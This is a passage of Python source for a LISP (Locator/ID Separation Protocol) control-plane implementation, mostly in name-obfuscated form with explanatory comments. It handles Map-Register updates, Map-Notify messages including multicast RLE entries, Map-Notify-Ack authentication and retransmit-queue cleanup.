  if ( iiI . record_ttl == 0 and o0Oo0o0ooOOO ) :
   lprint ( " Ignore deregistration request from {}" . format ( red ( source . print_address_no_iid ( ) , False ) ) )
   if 37 - 37: iII111i % I1IiiI - I1ii11iIi11i % I11i
   continue
  if 35 - 35: O0 - OoooooooOO % iII111i
  if 48 - 48: OOooOOo % i11iIiiIii
  if 49 - 49: O0 * iII111i + II111iiii - OOooOOo
  if 29 - 29: OoooooooOO % II111iiii - Oo0Ooo / IiII - i11iIiiIii
  if 64 - 64: iII111i . I1Ii111 + I1Ii111
  if 1 - 1: OOooOOo % Oo0Ooo
  # Save the old RLOC-set so we can compare and, on change, Map-Notify
  # the previous registerers.
  OO00o = oO00Oooo0o0o0 . registered_rlocs
  oO00Oooo0o0o0 . registered_rlocs = [ ]
  if 76 - 76: OoooooooOO % O0 / OoO0O00
  if 41 - 41: i11iIiiIii - I1ii11iIi11i - II111iiii
  if 5 - 5: OoOoOO00 + i1IIi
  if 43 - 43: iII111i * I1IiiI
  # Decode each RLOC-record and build the new registered RLOC-set.
  IiOOo = packet
  for oOoOoO0O in range ( iiI . rloc_count ) :
   iIii1IiIiI = lisp_rloc_record ( )
   packet = iIii1IiIiI . decode ( packet , None )
   if ( packet == None ) :
    lprint ( " Could not decode RLOC-record in Map-Register packet" )
    return
   if 99 - 99: OOooOOo . IiII
   iIii1IiIiI . print_record ( " " )
   if 77 - 77: I1IiiI + I11i * iIii1I11I1II1 / I1IiiI - iII111i
   if 42 - 42: oO0o * IiII
   if 37 - 37: I11i * ooOoO0o / IiII . I1ii11iIi11i + II111iiii
   if 55 - 55: OoO0O00
   # Enforce the site's configured allowed RLOC-set, when present.
   if ( len ( iIiOo0OOOOo . allowed_rlocs ) > 0 ) :
    oo0o00OO = iIii1IiIiI . rloc . print_address ( )
    if ( iIiOo0OOOOo . allowed_rlocs . has_key ( oo0o00OO ) == False ) :
     lprint ( ( " Reject registration, RLOC {} not " + "configured in allowed RLOC-set" ) . format ( red ( oo0o00OO , False ) ) )
     if 63 - 63: o0oOOo0O0Ooo / IiII - i11iIiiIii
     if 99 - 99: O0 + O0 . iIii1I11I1II1 . ooOoO0o * o0oOOo0O0Ooo
     oO00Oooo0o0o0 . registered = False
     packet = iIii1IiIiI . end_of_rlocs ( packet ,
      iiI . rloc_count - oOoOoO0O - 1 )
     break
   if 1 - 1: I1Ii111 - I11i . OoOoOO00
   if 72 - 72: II111iiii . O0 . I11i * OoO0O00
   if 70 - 70: iII111i % OoooooooOO * I1ii11iIi11i . I11i / OoO0O00
   if 6 - 6: O0 . i11iIiiIii
   if 85 - 85: i11iIiiIii / Ii1I + Oo0Ooo / OoOoOO00 - I1IiiI
   if 39 - 39: OoO0O00
   oOo00O = lisp_rloc ( )
   oOo00O . store_rloc_from_record ( iIii1IiIiI , None , source )
   if 97 - 97: iIii1I11I1II1 . I1IiiI - O0
   if 41 - 41: I11i . OoOoOO00 * O0 % Ii1I
   if 54 - 54: ooOoO0o
   if 13 - 13: I11i
   if 18 - 18: II111iiii * oO0o % i11iIiiIii / IiII . ooOoO0o
   if 2 - 2: OoOoOO00 % I1Ii111
   # Only the RLOC matching the packet source inherits the sender's
   # want-map-notify flag.
   if ( source . is_exact_match ( oOo00O . rloc ) ) :
    oOo00O . map_notify_requested = oo0Oo0oOo0 . map_notify_requested
   if 35 - 35: OOooOOo
   if 50 - 50: iIii1I11I1II1 . I1IiiI + i11iIiiIii
   if 65 - 65: I11i % I1IiiI
   if 3 - 3: i11iIiiIii % OOooOOo - Ii1I . i1IIi
   if 24 - 24: OOooOOo
   oO00Oooo0o0o0 . registered_rlocs . append ( oOo00O )
  if 93 - 93: I1ii11iIi11i - iII111i % O0 - Ii1I
  if 84 - 84: I1ii11iIi11i . iIii1I11I1II1 % IiII * I11i + ooOoO0o
  # True when the new RLOC-set differs from the previous one.
  OOOO00OO0O0o = ( oO00Oooo0o0o0 . do_rloc_sets_match ( OO00o ) == False )
  if 20 - 20: iIii1I11I1II1 % oO0o + o0oOOo0O0Ooo + oO0o % IiII
  if 84 - 84: IiII - O0 . I1ii11iIi11i % OOooOOo % iII111i + OoooooooOO
  if 74 - 74: o0oOOo0O0Ooo + OoOoOO00 - o0oOOo0O0Ooo
  if 2 - 2: OOooOOo
  if 14 - 14: Ii1I - O0 - IiII % Ii1I / OoOoOO00 * OoooooooOO
  if 57 - 57: Oo0Ooo % Oo0Ooo % O0 . I1Ii111 % I1ii11iIi11i
  # A refresh registration may not change the RLOC-set; restore it.
  if ( oo0Oo0oOo0 . map_register_refresh and OOOO00OO0O0o and
   oO00Oooo0o0o0 . registered ) :
   lprint ( " Reject registration, refreshes cannot change RLOC-set" )
   oO00Oooo0o0o0 . registered_rlocs = OO00o
   continue
  if 97 - 97: Oo0Ooo % OoO0O00 * I1ii11iIi11i * ooOoO0o * OoO0O00
  if 12 - 12: ooOoO0o
  if 56 - 56: i1IIi
  if 3 - 3: OOooOOo - Oo0Ooo * Ii1I + i11iIiiIii
  if 53 - 53: i1IIi % I1ii11iIi11i
  if 65 - 65: I11i + OoOoOO00 - i11iIiiIii
  # First registration for this site-EID: bump the global counter.
  if ( oO00Oooo0o0o0 . registered == False ) :
   oO00Oooo0o0o0 . first_registered = lisp_get_timestamp ( )
   lisp_registered_count += 1
  if 72 - 72: i11iIiiIii - iII111i . i11iIiiIii
  oO00Oooo0o0o0 . last_registered = lisp_get_timestamp ( )
  oO00Oooo0o0o0 . registered = ( iiI . record_ttl != 0 )
  oO00Oooo0o0o0 . last_registerer = source
  if 61 - 61: oO0o . i11iIiiIii / Ii1I % iII111i
  if 36 - 36: OoO0O00 + Ii1I / I11i - iII111i % OoO0O00 / Oo0Ooo
  if 38 - 38: Ii1I - ooOoO0o - O0 + oO0o . iIii1I11I1II1
  if 90 - 90: i1IIi * OoOoOO00
  # Copy per-registration flags from the Map-Register header.
  oO00Oooo0o0o0 . auth_sha1_or_sha2 = iII111
  oO00Oooo0o0o0 . proxy_reply_requested = oo0Oo0oOo0 . proxy_reply_requested
  oO00Oooo0o0o0 . lisp_sec_present = oo0Oo0oOo0 . lisp_sec_present
  oO00Oooo0o0o0 . map_notify_requested = oo0Oo0oOo0 . map_notify_requested
  oO00Oooo0o0o0 . mobile_node_requested = oo0Oo0oOo0 . mobile_node
  oO00Oooo0o0o0 . merge_register_requested = oo0Oo0oOo0 . merge_register_requested
  if 27 - 27: iIii1I11I1II1
  oO00Oooo0o0o0 . use_register_ttl_requested = oo0Oo0oOo0 . use_ttl_for_timeout
  if ( oO00Oooo0o0o0 . use_register_ttl_requested ) :
   oO00Oooo0o0o0 . register_ttl = iiI . store_ttl ( )
  else :
   oO00Oooo0o0o0 . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
  if 95 - 95: iII111i / ooOoO0o % Ii1I
  oO00Oooo0o0o0 . xtr_id_present = oo0Oo0oOo0 . xtr_id_present
  if ( oO00Oooo0o0o0 . xtr_id_present ) :
   oO00Oooo0o0o0 . xtr_id = oo0Oo0oOo0 . xtr_id
   oO00Oooo0o0o0 . site_id = oo0Oo0oOo0 . site_id
  if 44 - 44: OOooOOo . OOooOOo
  if 5 - 5: oO0o + OoooooooOO
  if 88 - 88: oO0o + OOooOOo
  if 14 - 14: I11i / i1IIi
  if 56 - 56: OoooooooOO
  # Merge this individual registration into the parent and, when asked,
  # send a merged Map-Notify back.
  if ( oo0Oo0oOo0 . merge_register_requested ) :
   if ( i1II1 . merge_in_site_eid ( oO00Oooo0o0o0 ) ) :
    o0o00oo00O . append ( [ iiI . eid , iiI . group ] )
   if 59 - 59: I1ii11iIi11i + OoO0O00
   if ( oo0Oo0oOo0 . map_notify_requested ) :
    lisp_send_merged_map_notify ( lisp_sockets , i1II1 , oo0Oo0oOo0 ,
     iiI )
  if 37 - 37: IiII * I1IiiI % O0
  if 32 - 32: ooOoO0o % II111iiii
  if 60 - 60: i11iIiiIii
  if ( OOOO00OO0O0o == False ) : continue
  if ( len ( o0o00oo00O ) != 0 ) : continue
  if 11 - 11: o0oOOo0O0Ooo
  ooOo000OOooo . append ( oO00Oooo0o0o0 . print_eid_tuple ( ) )
  if 77 - 77: o0oOOo0O0Ooo / iIii1I11I1II1 * iIii1I11I1II1 / o0oOOo0O0Ooo * iII111i
  if 26 - 26: Ii1I
  if 1 - 1: OoOoOO00 . o0oOOo0O0Ooo + Oo0Ooo % Oo0Ooo * I1ii11iIi11i
  if 50 - 50: IiII / i1IIi . I1ii11iIi11i
  if 75 - 75: I11i * oO0o + OoooooooOO . iII111i + OoO0O00
  if 44 - 44: II111iiii
  if 65 - 65: I11i . iII111i . I1IiiI - Oo0Ooo % iIii1I11I1II1 / O0
  # RLOC-set changed: Map-Notify the old RLOC-set (except the sender).
  iiI = iiI . encode ( )
  iiI += IiOOo
  OooOOoooOO00 = [ oO00Oooo0o0o0 . print_eid_tuple ( ) ]
  lprint ( " Changed RLOC-set, Map-Notifying old RLOC-set" )
  if 54 - 54: iII111i - I1Ii111
  for oOo00O in OO00o :
   if ( oOo00O . map_notify_requested == False ) : continue
   if ( oOo00O . rloc . is_exact_match ( source ) ) : continue
   lisp_build_map_notify ( lisp_sockets , iiI , OooOOoooOO00 , 1 , oOo00O . rloc ,
    LISP_CTRL_PORT , oo0Oo0oOo0 . nonce , oo0Oo0oOo0 . key_id ,
    oo0Oo0oOo0 . alg_id , oo0Oo0oOo0 . auth_len , iIiOo0OOOOo , False )
  if 88 - 88: iII111i * OoO0O00 % OoooooooOO / oO0o
  if 7 - 7: i1IIi
  if 30 - 30: oO0o . i1IIi / I11i
  if 23 - 23: i1IIi + oO0o % iII111i - OoO0O00 - i1IIi
  if 74 - 74: Ii1I + I11i . OoooooooOO - I1ii11iIi11i
  lisp_notify_subscribers ( lisp_sockets , iiI , oO00Oooo0o0o0 . eid , iIiOo0OOOOo )
 if 2 - 2: oO0o - o0oOOo0O0Ooo
 if 80 - 80: i1IIi
 if 40 - 40: O0 . ooOoO0o * iII111i . I11i + I1Ii111 % OoO0O00
 if 9 - 9: IiII * oO0o - o0oOOo0O0Ooo
 if 17 - 17: iII111i % Oo0Ooo
 # Queue Map-Notify messages for any merged multicast entries.
 if ( len ( o0o00oo00O ) != 0 ) :
  lisp_queue_multicast_map_notify ( lisp_sockets , o0o00oo00O )
 if 14 - 14: I1IiiI - I1Ii111 % I1IiiI - II111iiii
 if 34 - 34: I1ii11iIi11i * IiII / II111iiii / ooOoO0o * oO0o
 if 3 - 3: II111iiii
 if 61 - 61: oO0o . I1IiiI + i1IIi
 if 69 - 69: O0 / i1IIi - OoOoOO00 + ooOoO0o - oO0o
 if 80 - 80: o0oOOo0O0Ooo % O0 * I11i . i1IIi - ooOoO0o
 # Merged registrations were already notified above.
 if ( oo0Oo0oOo0 . merge_register_requested ) : return
 if 93 - 93: OoooooooOO / o0oOOo0O0Ooo
 if 61 - 61: II111iiii / i1IIi . I1ii11iIi11i % iIii1I11I1II1
 if 66 - 66: iIii1I11I1II1 % OoOoOO00 + i1IIi * i11iIiiIii * OoooooooOO
 if 36 - 36: iII111i - OoO0O00 + I1IiiI + Ii1I . OoooooooOO
 if 75 - 75: oO0o * Oo0Ooo * O0
 # Regular case: acknowledge the registration with a Map-Notify.
 if ( oo0Oo0oOo0 . map_notify_requested and iIiOo0OOOOo != None ) :
  lisp_build_map_notify ( lisp_sockets , oo0OO , ooOo000OOooo ,
   oo0Oo0oOo0 . record_count , source , sport , oo0Oo0oOo0 . nonce ,
   oo0Oo0oOo0 . key_id , oo0Oo0oOo0 . alg_id , oo0Oo0oOo0 . auth_len ,
   iIiOo0OOOOo , True )
 if 22 - 22: ooOoO0o / OoooooooOO . II111iiii / Ii1I * OoO0O00 . i1IIi
 return
if 62 - 62: oO0o % Ii1I - Ii1I
if 16 - 16: OoO0O00 - O0 - OOooOOo - I11i % OoOoOO00
if 7 - 7: I1Ii111 / OoOoOO00 . II111iiii
if 9 - 9: I11i . I11i . OoooooooOO
if 42 - 42: iII111i / oO0o / iII111i * OoO0O00
if 25 - 25: OoOoOO00 - II111iiii + II111iiii . Ii1I * II111iiii
if 12 - 12: IiII / Ii1I
if 54 - 54: Oo0Ooo + Ii1I % OoooooooOO * OOooOOo / OoOoOO00
if 39 - 39: I1IiiI % i11iIiiIii % Ii1I
if 59 - 59: ooOoO0o % OoO0O00 / I1IiiI - II111iiii + OoooooooOO * i11iIiiIii
def lisp_process_multicast_map_notify ( packet , source ) :
    """
    Process a Map-Notify carrying multicast (S,G) EID-records: for each
    record, find or glean-create the map-cache entry and replace its
    RLOC-set with the RLE (Replication List Entry) RLOCs in the record.

    packet: raw Map-Notify payload.
    source: sender's address object, or the string "lisp-etr" when the
            notify arrived over the internal IPC path (then no mapping
            source is recorded).
    Returns None; all results are map-cache side effects.
    """
    map_notify = lisp_map_notify ( "" )
    packet = map_notify . decode ( packet )
    if ( packet == None ) :
        lprint ( "Could not decode Map-Notify packet" )
        return

    map_notify . print_notify ( )
    if ( map_notify . record_count == 0 ) : return

    eid_records = map_notify . eid_records

    for _ in range ( map_notify . record_count ) :
        eid_record = lisp_eid_record ( )
        eid_records = eid_record . decode ( eid_records )

        #
        # Bug fix: test the value just decoded. The previous code tested
        # 'packet', which was fully consumed above and known non-None, so
        # a malformed EID-record was never detected.
        #
        if ( eid_records == None ) : return
        eid_record . print_record ( " " , False )

        #
        # Find the map-cache entry; create one only when gleaning is
        # allowed for this (EID, group).
        #
        mc = lisp_map_cache_lookup ( eid_record . eid , eid_record . group )
        if ( mc == None ) :
            allow , _x , _y = lisp_allow_gleaning ( eid_record . eid ,
                eid_record . group , None )
            if ( allow == False ) : continue

            mc = lisp_mapping ( eid_record . eid , eid_record . group , [ ] )
            mc . add_cache ( )

        #
        # Never overwrite state that was learned by gleaning.
        #
        if ( mc . gleaned ) :
            lprint ( "Ignore Map-Notify for gleaned {}" . format ( green ( mc . print_eid_tuple ( ) , False ) ) )
            continue

        mc . mapping_source = None if source == "lisp-etr" else source
        mc . map_cache_ttl = eid_record . store_ttl ( )

        #
        # A record with zero RLOCs clears a non-empty RLOC-set.
        #
        if ( len ( mc . rloc_set ) != 0 and eid_record . rloc_count == 0 ) :
            mc . rloc_set = [ ]
            mc . build_best_rloc_set ( )
            lisp_write_ipc_map_cache ( True , mc )
            lprint ( "Update {} map-cache entry with no RLOC-set" . format ( green ( mc . print_eid_tuple ( ) , False ) ) )
            continue

        had_rtrs = mc . rtrs_in_rloc_set ( )

        #
        # Store each RLE-bearing RLOC-record into the map-cache entry.
        #
        for _j in range ( eid_record . rloc_count ) :
            rloc_record = lisp_rloc_record ( )
            eid_records = rloc_record . decode ( eid_records , None )

            #
            # Robustness fix: stop on a malformed RLOC-record instead of
            # dereferencing a None decode result on the next iteration.
            #
            if ( eid_records == None ) : return
            rloc_record . print_record ( " " )
            if ( eid_record . group . is_null ( ) ) : continue
            if ( rloc_record . rle == None ) : continue

            #
            # Preserve traffic counters from the previous RLOC entry.
            #
            old_stats = mc . rloc_set [ 0 ] . stats if len ( mc . rloc_set ) != 0 else None

            rloc = lisp_rloc ( )
            rloc . store_rloc_from_record ( rloc_record , None , mc . mapping_source )
            if ( old_stats != None ) : rloc . stats = copy . deepcopy ( old_stats )

            #
            # If the old set went through RTRs, only accept RTR RLOCs.
            #
            if ( had_rtrs and rloc . is_rtr ( ) == False ) : continue

            mc . rloc_set = [ rloc ]
            mc . build_best_rloc_set ( )
            lisp_write_ipc_map_cache ( True , mc )

            lprint ( "Update {} map-cache entry with RLE {}" . format ( green ( mc . print_eid_tuple ( ) , False ) ,
                rloc . rle . print_rle ( False , True ) ) )
    return
if 61 - 61: OoooooooOO - OoOoOO00 . O0 / ooOoO0o . Ii1I
if 41 - 41: Oo0Ooo / OoOoOO00 % I1Ii111 - O0
if 19 - 19: I1IiiI % I1Ii111 - O0 . iIii1I11I1II1 . I11i % O0
if 88 - 88: ooOoO0o
if 52 - 52: iIii1I11I1II1 % ooOoO0o * iIii1I11I1II1
if 20 - 20: i11iIiiIii * I11i
if 29 - 29: IiII / OOooOOo
if 39 - 39: O0 + II111iiii
def lisp_process_map_notify ( lisp_sockets , orig_packet , source ) :
 """Process a received Map-Notify message.

 Decodes the Map-Notify from 'orig_packet', authenticates it against the
 configured map-server matching 'source' when authentication data is
 present, prints the embedded EID/RLOC records, forwards multicast
 (group) entries to the lisp-itr process over IPC, and finally answers
 with a Map-Notify-Ack.  Returns None.

 Note: the 'if N - N:' one-liners throughout are obfuscator-inserted
 no-ops (the condition is always zero/false); they are preserved here
 untouched.
 """
 IiiiiIiI1ii = lisp_map_notify ( "" )
 IIii1i = IiiiiIiI1ii . decode ( orig_packet )
 if ( IIii1i == None ) :
  lprint ( "Could not decode Map-Notify packet" )
  return
 if 94 - 94: OOooOOo % I1ii11iIi11i % O0 + iII111i
 if 62 - 62: iIii1I11I1II1 . OoOoOO00 / iIii1I11I1II1 + IiII
 IiiiiIiI1ii . print_notify ( )
 if 31 - 31: Ii1I . OoO0O00 . Ii1I + OoO0O00 * iIii1I11I1II1 . iII111i
 if 42 - 42: O0 / oO0o % O0 . i1IIi % OOooOOo
 if 13 - 13: I1IiiI % ooOoO0o + OOooOOo
 if 91 - 91: oO0o - ooOoO0o
 if 20 - 20: i1IIi . IiII / o0oOOo0O0Ooo / I11i
 # When the message carries authentication material, find the configured
 # map-server whose key name contains the source address and verify the
 # hash against its password.
 IiII1iiI = source . print_address ( )
 if ( IiiiiIiI1ii . alg_id != 0 or IiiiiIiI1ii . auth_len != 0 ) :
  o00oO0Oo = None
  for ii1i1I1111ii in lisp_map_servers_list :
   if ( ii1i1I1111ii . find ( IiII1iiI ) == - 1 ) : continue
   o00oO0Oo = lisp_map_servers_list [ ii1i1I1111ii ]
  if 27 - 27: ooOoO0o . ooOoO0o - Ii1I % i11iIiiIii
  if ( o00oO0Oo == None ) :
   lprint ( ( " Could not find Map-Server {} to authenticate " + "Map-Notify" ) . format ( IiII1iiI ) )
   if 74 - 74: I1Ii111 - II111iiii % o0oOOo0O0Ooo
   return
  if 7 - 7: I1IiiI + OoooooooOO + o0oOOo0O0Ooo . OoooooooOO
  if 29 - 29: iII111i * O0 + I1IiiI * IiII + iII111i - IiII
  o00oO0Oo . map_notifies_received += 1
  if 38 - 38: I1ii11iIi11i - Ii1I % OoooooooOO
  IIIIi1Iiii = lisp_verify_auth ( IIii1i , IiiiiIiI1ii . alg_id ,
  IiiiiIiI1ii . auth_data , o00oO0Oo . password )
  if 43 - 43: iIii1I11I1II1 / OoOoOO00
  lprint ( " Authentication {} for Map-Notify" . format ( "succeeded" if IIIIi1Iiii else "failed" ) )
  if 13 - 13: o0oOOo0O0Ooo / I1Ii111
  if ( IIIIi1Iiii == False ) : return
 else :
  # No authentication present: build a placeholder map-server record so
  # the ack path below has an 'ms' to work with.
  o00oO0Oo = lisp_ms ( IiII1iiI , None , "" , 0 , "" , False , False , False , False , 0 , 0 , 0 ,
  None )
 if 67 - 67: OoooooooOO . oO0o * OoOoOO00 - OoooooooOO
 if 32 - 32: oO0o
 if 72 - 72: I1IiiI
 if 34 - 34: ooOoO0o % II111iiii / ooOoO0o
 if 87 - 87: Oo0Ooo
 if 7 - 7: iIii1I11I1II1
 # An empty Map-Notify is acked immediately.
 oO0oOOoo0OO0 = IiiiiIiI1ii . eid_records
 if ( IiiiiIiI1ii . record_count == 0 ) :
  lisp_send_map_notify_ack ( lisp_sockets , oO0oOOoo0OO0 , IiiiiIiI1ii , o00oO0Oo )
  return
 if 85 - 85: iIii1I11I1II1 . O0
 if 43 - 43: II111iiii / OoOoOO00 + OOooOOo % Oo0Ooo * OOooOOo
 if 62 - 62: ooOoO0o * OOooOOo . I11i + Oo0Ooo - I1Ii111
 if 48 - 48: I1Ii111 * Oo0Ooo % OoO0O00 % Ii1I
 if 8 - 8: OoO0O00 . OoO0O00
 if 29 - 29: I11i + OoooooooOO % o0oOOo0O0Ooo - I1Ii111
 if 45 - 45: II111iiii - OOooOOo / oO0o % O0 . iII111i . iII111i
 if 82 - 82: iIii1I11I1II1 % Oo0Ooo * i1IIi - I1Ii111 - I1ii11iIi11i / iII111i
 # Decode and print the first EID-record and its RLOC-records.
 iiI = lisp_eid_record ( )
 IIii1i = iiI . decode ( oO0oOOoo0OO0 )
 if ( IIii1i == None ) : return
 if 24 - 24: IiII
 iiI . print_record ( " " , False )
 if 95 - 95: IiII + OoOoOO00 * OOooOOo
 for oOoOoO0O in range ( iiI . rloc_count ) :
  iIii1IiIiI = lisp_rloc_record ( )
  IIii1i = iIii1IiIiI . decode ( IIii1i , None )
  if ( IIii1i == None ) :
   lprint ( " Could not decode RLOC-record in Map-Notify packet" )
   return
  if 92 - 92: OoOoOO00 + ooOoO0o . iII111i
  iIii1IiIiI . print_record ( " " )
 if 59 - 59: iIii1I11I1II1 % I1Ii111 + I1ii11iIi11i . OoOoOO00 * Oo0Ooo / I1Ii111
 if 41 - 41: i1IIi / IiII
 if 73 - 73: o0oOOo0O0Ooo % ooOoO0o
 if 72 - 72: OoO0O00 * OoOoOO00 % I1IiiI - OOooOOo . Oo0Ooo
 if 70 - 70: ooOoO0o . o0oOOo0O0Ooo * II111iiii - O0
 # Multicast (group) entries are forwarded to the ITR process so it can
 # update its map-cache.
 if ( iiI . group . is_null ( ) == False ) :
  if 74 - 74: oO0o % I1IiiI / oO0o / Oo0Ooo / ooOoO0o
  if 29 - 29: ooOoO0o + iIii1I11I1II1 + OoO0O00 - o0oOOo0O0Ooo
  if 74 - 74: II111iiii - II111iiii + ooOoO0o + Oo0Ooo % iIii1I11I1II1
  if 90 - 90: oO0o / o0oOOo0O0Ooo . o0oOOo0O0Ooo % OoOoOO00 / IiII
  if 13 - 13: oO0o + IiII
  lprint ( "Send {} Map-Notify IPC message to ITR process" . format ( green ( iiI . print_eid_tuple ( ) , False ) ) )
  if 36 - 36: oO0o - OoOoOO00 . O0 % IiII
  if 65 - 65: Oo0Ooo - i11iIiiIii * OoOoOO00 . I1Ii111 . iIii1I11I1II1
  OoOO0o00OOO0o = lisp_control_packet_ipc ( orig_packet , IiII1iiI , "lisp-itr" , 0 )
  lisp_ipc ( OoOO0o00OOO0o , lisp_sockets [ 2 ] , "lisp-core-pkt" )
 if 48 - 48: iIii1I11I1II1 - oO0o / OoO0O00 + O0 . Ii1I + I1Ii111
 if 17 - 17: OoOoOO00 . Oo0Ooo - I1Ii111 / I1Ii111 + I11i % i1IIi
 if 31 - 31: OoooooooOO . O0 / OoO0O00 . I1Ii111
 if 41 - 41: OoooooooOO + iII111i . OOooOOo
 if 73 - 73: oO0o + i1IIi + i11iIiiIii / I1ii11iIi11i
 # Always acknowledge the Map-Notify.
 lisp_send_map_notify_ack ( lisp_sockets , oO0oOOoo0OO0 , IiiiiIiI1ii , o00oO0Oo )
 return
if 100 - 100: I1IiiI % ooOoO0o % OoooooooOO / i11iIiiIii + i11iIiiIii % IiII
if 39 - 39: Ii1I % o0oOOo0O0Ooo + OOooOOo / iIii1I11I1II1
if 40 - 40: iIii1I11I1II1 / iII111i % OOooOOo % i11iIiiIii
if 57 - 57: II111iiii % OoO0O00 * i1IIi
if 19 - 19: ooOoO0o . iIii1I11I1II1 + I1ii11iIi11i + I1ii11iIi11i / o0oOOo0O0Ooo . Oo0Ooo
if 9 - 9: II111iiii % OoooooooOO
if 4 - 4: i1IIi * i11iIiiIii % OoooooooOO + OoOoOO00 . oO0o
if 95 - 95: I1ii11iIi11i * OoOoOO00 % o0oOOo0O0Ooo / O0 + ooOoO0o % OOooOOo
def lisp_process_map_notify_ack ( packet , source ) :
 """Process a received Map-Notify-Ack.

 Decodes the ack, authenticates it (when it carries auth material)
 using the registered site's key looked up from the first EID-record,
 then cancels the retransmit timer and removes the pending Map-Notify
 from the retransmit queue keyed by its nonce.  Returns None.

 Note: the 'if N - N:' one-liners are obfuscator-inserted no-ops and
 are preserved untouched.
 """
 IiiiiIiI1ii = lisp_map_notify ( "" )
 packet = IiiiiIiI1ii . decode ( packet )
 if ( packet == None ) :
  lprint ( "Could not decode Map-Notify-Ack packet" )
  return
 if 48 - 48: i1IIi + IiII - iIii1I11I1II1 . i11iIiiIii % OOooOOo + I1ii11iIi11i
 if 95 - 95: ooOoO0o + OoOoOO00 . II111iiii + Ii1I
 IiiiiIiI1ii . print_notify ( )
 if 81 - 81: OoooooooOO / OOooOOo / Oo0Ooo
 if 26 - 26: iII111i
 if 93 - 93: Oo0Ooo + I1IiiI % OoOoOO00 / OOooOOo / I1ii11iIi11i
 if 6 - 6: IiII
 if 68 - 68: Oo0Ooo
 # The EID-record is needed to find the site (and hence the auth key).
 if ( IiiiiIiI1ii . record_count < 1 ) :
  lprint ( "No EID-prefix found, cannot authenticate Map-Notify-Ack" )
  return
 if 83 - 83: OOooOOo / iIii1I11I1II1 . OoO0O00 - oO0o % Oo0Ooo
 if 30 - 30: Ii1I . OoOoOO00 / oO0o . OoO0O00
 iiI = lisp_eid_record ( )
 if 93 - 93: i11iIiiIii
 if ( iiI . decode ( IiiiiIiI1ii . eid_records ) == None ) :
  lprint ( "Could not decode EID-record, cannot authenticate " +
  "Map-Notify-Ack" )
  return
 if 33 - 33: i1IIi % OoooooooOO + Oo0Ooo % I1IiiI / ooOoO0o
 iiI . print_record ( " " , False )
 if 40 - 40: IiII % IiII
 I11i11i1 = iiI . print_eid_tuple ( )
 if 9 - 9: I1IiiI * i1IIi + OOooOOo * OoOoOO00
 if 8 - 8: iII111i
 if 51 - 51: I1IiiI
 if 72 - 72: ooOoO0o / I1ii11iIi11i . Ii1I * iII111i . iIii1I11I1II1
 # Authenticate against the registered site's key for the message key-id.
 if ( IiiiiIiI1ii . alg_id != LISP_NONE_ALG_ID and IiiiiIiI1ii . auth_len != 0 ) :
  oO00Oooo0o0o0 = lisp_sites_by_eid . lookup_cache ( iiI . eid , True )
  if ( oO00Oooo0o0o0 == None ) :
   i1i1IiIIIiI = bold ( "Site not found" , False )
   lprint ( ( "{} for EID {}, cannot authenticate Map-Notify-Ack" ) . format ( i1i1IiIIIiI , green ( I11i11i1 , False ) ) )
   if 35 - 35: OoO0O00 . OoOoOO00 % O0 * OoO0O00
   return
  if 68 - 68: OOooOOo
  iIiOo0OOOOo = oO00Oooo0o0o0 . site
  if 87 - 87: IiII * IiII - OoO0O00 / I1ii11iIi11i + OOooOOo / i11iIiiIii
  if 21 - 21: o0oOOo0O0Ooo / oO0o + oO0o + Oo0Ooo / o0oOOo0O0Ooo
  if 39 - 39: i11iIiiIii - OoO0O00 - i11iIiiIii / OoooooooOO
  if 15 - 15: i1IIi . iII111i + IiII / I1ii11iIi11i - i1IIi / iII111i
  iIiOo0OOOOo . map_notify_acks_received += 1
  if 27 - 27: OoOoOO00 / OoooooooOO + i1IIi % iIii1I11I1II1 / OoO0O00
  # An unknown key-id falls back to an empty password, which makes the
  # verification below fail (and the failure is logged).
  IIIiI1i = IiiiiIiI1ii . key_id
  if ( iIiOo0OOOOo . auth_key . has_key ( IIIiI1i ) ) :
   IIii1 = iIiOo0OOOOo . auth_key [ IIIiI1i ]
  else :
   IIii1 = ""
  if 73 - 73: I1ii11iIi11i / OoOoOO00 / IiII + oO0o
  if 73 - 73: I11i * o0oOOo0O0Ooo * I1IiiI . OoooooooOO % I1Ii111
  IIIIi1Iiii = lisp_verify_auth ( packet , IiiiiIiI1ii . alg_id ,
  IiiiiIiI1ii . auth_data , IIii1 )
  if 9 - 9: oO0o % I1Ii111 . O0 + I1ii11iIi11i - Ii1I - I1ii11iIi11i
  IIIiI1i = "key-id {}" . format ( IIIiI1i ) if IIIiI1i == IiiiiIiI1ii . key_id else "bad key-id {}" . format ( IiiiiIiI1ii . key_id )
  if 57 - 57: i11iIiiIii
  if 21 - 21: iIii1I11I1II1 / I1IiiI / iII111i
  lprint ( " Authentication {} for Map-Notify-Ack, {}" . format ( "succeeded" if IIIIi1Iiii else "failed" , IIIiI1i ) )
  if 19 - 19: Oo0Ooo / iIii1I11I1II1 / I11i
  if ( IIIIi1Iiii == False ) : return
 if 71 - 71: iIii1I11I1II1 * I1IiiI
 if 35 - 35: O0
 if 10 - 10: Ii1I - I1Ii111 / Oo0Ooo + O0
 if 67 - 67: Ii1I % i11iIiiIii . Oo0Ooo
 if 78 - 78: I1IiiI - iIii1I11I1II1
 # Stop retransmitting: cancel the timer and dequeue the pending
 # Map-Notify for this nonce.
 if ( IiiiiIiI1ii . retransmit_timer ) : IiiiiIiI1ii . retransmit_timer . cancel ( )
 if 20 - 20: i11iIiiIii % I1IiiI % OoOoOO00
 iIi11I11I1i = source . print_address ( )
 ii1i1I1111ii = IiiiiIiI1ii . nonce_key
 if 85 - 85: I11i + OoOoOO00 * O0 * O0
 if ( lisp_map_notify_queue . has_key ( ii1i1I1111ii ) ) :
  IiiiiIiI1ii = lisp_map_notify_queue . pop ( ii1i1I1111ii )
  if ( IiiiiIiI1ii . retransmit_timer ) : IiiiiIiI1ii . retransmit_timer . cancel ( )
  lprint ( "Dequeue Map-Notify from retransmit queue, key is: {}" . format ( ii1i1I1111ii ) )
  if 92 - 92: i11iIiiIii
 else :
  lprint ( "Map-Notify with nonce 0x{} queue entry not found for {}" . format ( IiiiiIiI1ii . nonce_key , red ( iIi11I11I1i , False ) ) )
 if 16 - 16: I11i . ooOoO0o - Oo0Ooo / OoO0O00 . i1IIi
 if 59 - 59: ooOoO0o - ooOoO0o % I11i + OoO0O00
 return
if 88 - 88: Ii1I - ooOoO0o . Oo0Ooo
if 83 - 83: I11i + Oo0Ooo . I1ii11iIi11i * I1ii11iIi11i
if 80 - 80: i1IIi * I11i - OOooOOo / II111iiii * iIii1I11I1II1
if 42 - 42: OoOoOO00 . I11i % II111iiii
